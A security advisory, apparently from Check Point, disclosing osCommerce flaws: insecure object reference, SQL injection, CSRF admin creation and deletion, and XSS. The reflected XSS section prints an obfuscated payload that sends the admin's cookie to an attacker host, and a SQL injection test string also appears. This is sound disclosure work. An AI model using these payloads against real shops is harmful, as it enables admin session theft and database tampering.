Who Really Controls Your Online Store?

Check Point researchers Avi Gimpel, Liad Mizrachi and Oded Vanunu recently discovered critical vulnerabilities in the osCommerce platform.

These vulnerabilities can lead to a full system compromise, with an outside agent gaining control over the osCommerce administration panel and access to the data of the platform stores’ members and customers. These vulnerabilities affect over 260,000 online shops.

About osCommerce

osCommerce provides the tools to create your very own online store to sell products and services to customers worldwide. osCommerce manages a thriving community of store owners, developers, and service providers who interact with and assist each other at every stage. For example, osCommerce worked in close collaboration with PayPal to provide updated PayPal payment modules and bundled all PayPal modules.

Check Point researchers often discover and find ways to protect against security vulnerabilities before malicious actors are able to exploit them. Liad Mizrachi, Security Expert at Check Point Software Technologies, said, “Check Point is committed to ensuring the security of all organizations. As such, we are obligated to raise awareness of the vulnerabilities that can affect the security of consumers and their businesses.”

Technical Details:

The following attack vectors were discovered during our research:

  • Insecure Object Reference
  • CSRF
  • Stored XSS
  • Reflected XSS


Insecure Object Reference

  • An attacker who would normally be blocked from accessing the Admin Cpanel and performing other malicious actions can gain entry by editing the DB column values.
  • The vulnerable file: admin\modules\modules.php


Vulnerability Diagnostic


The current Insecure Object Reference vulnerability we found is based on exploiting the configuration table (figure 1). This table is responsible for many critical issues and actions:

Figure 1 – Configuration table

Figure 1 – Configuration table

For each configuration_key there is a corresponding configuration_value.

To understand the actions of the keys system (Open Source), look at the configuration_description of the specified key.

Our exploit uses the Modules options, the place where the vulnerable IOR request will be sent.

The code behind the Modules option is located at: admin\modules\modules.php

Now let’s take a look at the osCommerce Admin panel:


Figure 2 – Admin Cpanel and modules options


Whenever a privileged user submits changes into the existing osCommerce models, the server will save and store the changed values in the configuration DB table (Figure 1).

The request sent as result of editing the models’ fields:


Figure 3 – Change modules’ fields request


To facilitate the process, let’s decode the post data request to make it more readable:


We can easily find that


are both values in the configuration_key column. The values True and vvv are in the configuration_value column. The post request (Figure 3) was transferred with the URL parameter action=”save”.

Now let’s dive deeper into the server side code, to see what’s behind the post request (Figure 3):

Figure 4 - Server side, building SQL query based on user input

Figure 4 – Server side, building SQL query based on user input


Analyzing the code shows that osCommerce builds a list of ( $key and $value) with every loop, and executes an SQL query using the submitted list $key and $value.

This is the first loop DB query sent during the loop process:

“update configuration set configuration_value = True where configuration_key = MODULE_SOCIAL_BOOKMARKS_EMAIL_STATUS”


By changing the keys


the server will obtain the given values under a different key.

To examine the insecure object reference, here is an example of the same request, but with a different key:

Figure 5 - Exploiting using insecure object reference

Figure 5 – Exploiting using insecure object reference


The server will update the configuration table with the value “AVIG” where configuration_key column = “STORE_OWNER”

Attack Implications

The above vulnerable post request (Figure 5) does not use any CSRF token protection. This allows the attacker to create a malicious html form which will submit the vulnerable post request + the payload execution to the osCommerce server via the admin user. The request will be sent when the admin is visiting the malicious page. (The osCommerce admin should be authenticated to the admin panel during the attack execution).

As we mentioned previously, the configuration table is responsible for all critical system data and processes. Rewriting the values for specific table keys will block all admin cpanel access. The only way to regain access to the cpanel is by restoring the DB and or specific key values (if they are known).


  • The current vulnerability allows the attacker to access and update the osCommerce DB.
  • The vulnerable file: admin\modules\modules.php


Vulnerability Diagnostic

  • The same modules.php file is vulnerable to SQLI.
  • osCommerce does not use any sanitation over the user input and gets the user data using $HTTP_POST_VARS [‘configuration’] without calling the regular osCommerce sanitation function.

    Figure 6 - SQLI Vulnerable Code

    Figure 6 – SQLI Vulnerable Code

osCommerce sanitation function for SQL query:

Figure 7- osCommerce Sanitation  Function

Figure 7- osCommerce Sanitation Function


Testing the vector over the osCommerce Cpanel responses with SQL error:

Figure 8 - SQLI Server error

Figure 8 – SQLI Server error


Submitting the request with a valid injection payload [‘and ‘1’=’1] results in redirection and the predicted result:

Figure 9- Successful SQLI

Figure 9- Successful SQLI


Attack Implications


Using the current SQLI, the attacker can access and update the osCommerce DB.

When we attempted to exploit the DB using this vulnerability, we had a problem: the vulnerable SQL file (modules.php) is blocked against simple users and open only to users with Admin privileges. What could we do to get around this?



(1)Retrieving the DB tables

If the server is opened with CORS configuration to allow foreign domains requests, the attacker can create a malicious web page in his domain to send an Ajax request with the above vulnerable post request (using the required payload). The attack will be executed via the osCommerce admin when he visits the malicious page. The attacker will get the osCommerce server response via the Ajax object.

(The Admin user should be authenticated to the osCommerce at the time of the exploit execution).

 (2) One-Time Injection

We have established that there is no CSRF token protection. This allows the attacker to create a malicious html form which will submit the vulnerable post request + the payload execution to the osCommerce server via the admin user. The attacker can use this vulnerability as a one-time injection to modify or destroy the DB table columns, without being able to retrieve the data (as was done in the previous option).

 (3)Using the Stored XSS (see Stored XSS).


CSRF Attack

Create or delete new administrator user using CSRF attack.-


Vulnerability Diagnostic


When we analyzed the New Administrator function, we discovered that requests for adding or deleting a new user in the admin cpanel are handled without any use of CSRF token protection. This can lead to serious security issues.

Delete Admin user using GET request:

The admin ID parameter is an auto incremental number to recognize an administrator user in the administrator DB table.

Figure 8 - CSRF create New Admin user

Figure 10 – CSRF create New Admin user


Attack Implications

Create or delete a new administrator via crafted URL.


Stored XSS

Injecting HTML/JS code that will run persistently each time the user visits the web site.


Vulnerability Diagnostic

XSS using POST request



Attack Implications

Injecting persistence HTML/JS code into the machines of users visiting the site.



Reflected XSS

Injecting HTML/JS code when the user follows a crafted URL in the context of visiting the vulnerable oScommerce site.

XSS using GET request{eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47,119,119,119,46,97,116,116,97,99,107,101,114,46,99,111,46,105,108,47,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));})();%3Effff%3C/h1%3E


Attack Implications

The above XSS POC will transfer the user to the malicious site, and sends the Admin users’ cookie concatenated with the site’s URI:


Attack Implications

Injecting HTML/JS code into the user browser via the crafted URL.


How can I protect against the vulnerability?

  1. Check Point IPS currently protects against exploitation attempts of these vulnerabilities:
    1. Protections names:
      1. osCommerce Cross-Site Request Forgery Administrator Deletion
      2. osCommerce Mail Cross-Site Scripting Attempt
      3. osCommerce Configuration SQL Injection Attempt
      4. osCommerce Cross-Site Request Forgery Administrator Creation
      5. osCommerce Configuration Cross-Site Scripting
  1. Vendor Fix